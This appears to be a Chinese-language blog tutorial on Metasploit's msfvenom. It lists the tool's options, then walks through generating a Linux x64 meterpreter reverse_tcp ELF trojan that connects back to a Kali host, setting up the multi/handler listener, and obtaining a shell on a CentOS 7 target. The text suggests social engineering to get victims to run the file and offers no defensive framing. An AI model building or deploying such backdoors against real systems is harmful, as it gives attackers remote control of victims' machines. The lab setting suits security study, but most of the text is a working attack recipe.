一msfvenom简介以及参数:
美少妇(msf)主要用来生成带后门的软件。
进入kali inux查看msfvenom的具体参数说明(我这里使用xshell链接虚拟机):
msfvenom -h
参数具体说明:
-l, --list <type>:列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,......all
-p, --payload <payload>:指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的
-f, --format <format>:指定输出格式
-e, --encoder <encoder>:指定需要使用的encoder(编码器),如果既没用-e选项也没用-b选项,则输出raw payload
-a, --arch <architecture>:指定payload的目标架构,例如x86 还是 x64 还是 x86_64
--platform <platform>:指定payload的目标平台
-o, --out <path>:指定创建好的payload的存放位置
-b, --bad-chars <list>:设定规避字符集,指定需要过滤的坏字符,避免加密后无法使用。例如:不使用 '\x0f'、'\x00'
-n, --nopsled <length>:为payload预先指定一个NOP滑动长度
-s, --space <length>:设定有效攻击荷载的最大长度,就是文件大小
-i, --iterations <count>:指定payload的编码次数
-c, --add-code <path>:指定一个附加的win32 shellcode文件
-x, --template <path>:指定一个自定义的可执行文件作为模板,并将payload嵌入其中
-k, --keep:保护模板程序的动作,注入的payload作为一个新的进程运行
-v, --var-name <value>:指定一个自定义的变量,以确定输出格式
-t, --timeout <second>:从stdin读取有效负载时等待的秒数(默认为30,0表示禁用)
-h,--help:查看帮助选项
二.木马的连接方式
-
正向连接(bind)
攻击方主动去被攻击方上的某个端口
-
反向连接(reverse)
被攻击方使用某个端口主动连接攻击方的某个端口
这里我想说明一下,一般来说msfvenom生成木马程序使用的常见连接是反向连接,更稳定且一般来说不会被防火墙阻掉。
三.生成木马
kali:192.168.153.129
centos7(靶机)
生成木马程序:
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.153.129 lport=6666 -f elf -o cai_cai_zhe_shi_shen_me.elf
-p:指定载荷为linux/x64/meterpreter/reverse_tcp也就是linux内核64架构的tcp反向连接载荷
lhost/lport:kali的ip与端口
-f:输出格式为elf文件
-o:输出名字为你猜猜这是什么.elf
这时候我们就可以利用社工的方式让被攻击者获取到这个elf文件并且执行它(这个文件名有点蠢就是了= =)
我这里就直接上传到centos虚拟机里
然后回到kali里面利用msfconsole监听
使用handler模块
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.153.129
set lport 6666
run
然后就等待centos那边执行,这边就连接上了
注意那边把文件权限chmod一下
再回到kali:
连接成功!
通过shell执行命令
看到内核版本以及切换到根目录查看文件
咱们就可以控制这台centos7系统的主机了